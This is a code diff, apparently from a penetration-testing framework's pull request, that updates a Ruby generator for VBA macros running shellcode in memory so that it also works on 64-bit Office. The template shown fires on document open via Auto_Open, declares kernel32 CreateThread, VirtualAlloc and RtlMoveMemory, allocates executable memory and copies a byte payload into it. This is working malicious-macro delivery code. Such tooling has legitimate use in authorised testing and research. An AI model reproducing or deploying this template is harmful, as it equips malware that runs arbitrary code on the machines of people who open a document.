Merge pull request #123 from scriptjunkie/master
x64 LongPtr support for in-mem VBA shellcodeunstable
commit
a328bb21f1
|
@ -837,12 +837,23 @@ require 'digest/sha1'
|
|||
bytes << " _\r\n" if (idx > 1 and (idx % maxbytes) == 0)
|
||||
end
|
||||
|
||||
"Private Declare Function CreateThread Lib \"kernel32\" (ByVal #{var_lpThreadAttributes} As Long, ByVal #{var_dwStackSize} As Long, ByVal #{var_lpStartAddress} As Long, #{var_lpParameter} As Long, ByVal #{var_dwCreationFlags} As Long, #{var_lpThreadID} As Long) As Long
|
||||
"#If Vba7 Then
|
||||
Private Declare PtrSafe Function CreateThread Lib \"kernel32\" (ByVal #{var_lpThreadAttributes} As Long, ByVal #{var_dwStackSize} As Long, ByVal #{var_lpStartAddress} As LongPtr, #{var_lpParameter} As Long, ByVal #{var_dwCreationFlags} As Long, #{var_lpThreadID} As Long) As LongPtr
|
||||
Private Declare PtrSafe Function VirtualAlloc Lib \"kernel32\" (ByVal #{var_lpAddr} As Long, ByVal #{var_lSize} As Long, ByVal #{var_flAllocationType} As Long, ByVal #{var_flProtect} As Long) As LongPtr
|
||||
Private Declare PtrSafe Function RtlMoveMemory Lib \"kernel32\" (ByVal #{var_lDest} As LongPtr, ByRef #{var_Source} As Any, ByVal #{var_Length} As Long) As LongPtr
|
||||
#Else
|
||||
Private Declare Function CreateThread Lib \"kernel32\" (ByVal #{var_lpThreadAttributes} As Long, ByVal #{var_dwStackSize} As Long, ByVal #{var_lpStartAddress} As Long, #{var_lpParameter} As Long, ByVal #{var_dwCreationFlags} As Long, #{var_lpThreadID} As Long) As Long
|
||||
Private Declare Function VirtualAlloc Lib \"kernel32\" (ByVal #{var_lpAddr} As Long, ByVal #{var_lSize} As Long, ByVal #{var_flAllocationType} As Long, ByVal #{var_flProtect} As Long) As Long
|
||||
Private Declare Function RtlMoveMemory Lib \"kernel32\" (ByVal #{var_lDest} As Long, ByRef #{var_Source} As Any, ByVal #{var_Length} As Long) As Long
|
||||
#EndIf
|
||||
|
||||
Sub Auto_Open()
|
||||
Dim #{var_myByte} As Long, #{var_myArray} As Variant, #{var_rwxpage} As Long, #{var_res} As Long, #{var_offset} As Long
|
||||
Dim #{var_myByte} As Long, #{var_myArray} As Variant, #{var_res} As Long, #{var_offset} As Long
|
||||
#If Vba7 Then
|
||||
Dim #{var_rwxpage} As LongPtr
|
||||
#Else
|
||||
Dim #{var_rwxpage} As Long
|
||||
#EndIf
|
||||
#{var_myArray} = Array(#{bytes})
|
||||
#{var_rwxpage} = VirtualAlloc(0, UBound(#{var_myArray}), &H1000, &H40)
|
||||
For #{var_offset} = LBound(#{var_myArray}) To UBound(#{var_myArray})
|
||||
|
|
Loading…
Reference in New Issue